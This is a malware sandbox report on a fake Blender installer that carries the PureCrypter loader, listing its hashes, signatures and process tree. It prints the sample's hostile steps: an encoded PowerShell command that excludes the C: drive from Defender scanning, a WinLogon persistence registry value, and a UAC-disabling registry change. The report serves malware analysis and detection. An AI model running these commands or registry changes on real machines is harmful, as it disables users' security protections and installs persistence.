Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
38s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
02/02/2023, 10:14
Static task
static1
Behavioral task
behavioral1
Sample
blender-3.4.1-windows-x64.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
blender-3.4.1-windows-x64.exe
Resource
win10v2004-20220812-en
General
-
Target
blender-3.4.1-windows-x64.exe
-
Size
683.8MB
-
MD5
aedf8960317a0effcd89c5d816137067
-
SHA1
4e074a8e180a9d3248f5fceadf28ea4f7146b33e
-
SHA256
eeaaa0e20ba43f13e0b62862979abe7f50bb558a812fc4aa729e946fdbe54e98
-
SHA512
f1e7d861e01ebcc69cad9cceee712885ef1739a84923787bfe7d9e5e9e108b2721b2a1e916e4a33fa947ac84ed6010c1d32fdf0091b3a9ca7f34738a6be6981a
-
SSDEEP
3072:mcqqdOyJocZB0O7i4Cg3DILI48p8ERDuwBbEUA:T/dOyJovrg3/ppDuwBYU
Malware Config
Signatures
-
Detect PureCrypter injector 1 IoCs
resource yara_rule behavioral1/memory/1156-56-0x0000000007110000-0x00000000073EA000-memory.dmp family_purecrypter -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Tqhtsdgnsm\\Vcelkcpar.exe\"," blender-3.4.1-windows-x64.exe -
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" InstallUtil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 eth0.me -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1156 set thread context of 820 1156 blender-3.4.1-windows-x64.exe 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1156 blender-3.4.1-windows-x64.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 820 InstallUtil.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1156 wrote to memory of 680 1156 blender-3.4.1-windows-x64.exe 27 PID 1156 wrote to memory of 680 1156 blender-3.4.1-windows-x64.exe 27 PID 1156 wrote to memory of 680 1156 blender-3.4.1-windows-x64.exe 27 PID 1156 wrote to memory of 680 1156 blender-3.4.1-windows-x64.exe 27 PID 680 wrote to memory of 320 680 cmd.exe 29 PID 680 wrote to memory of 320 680 cmd.exe 29 PID 680 wrote to memory of 320 680 cmd.exe 29 PID 680 wrote to memory of 320 680 cmd.exe 29 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30 PID 1156 wrote to memory of 820 1156 blender-3.4.1-windows-x64.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- UAC bypass
- Suspicious use of AdjustPrivilegeToken
PID:820
-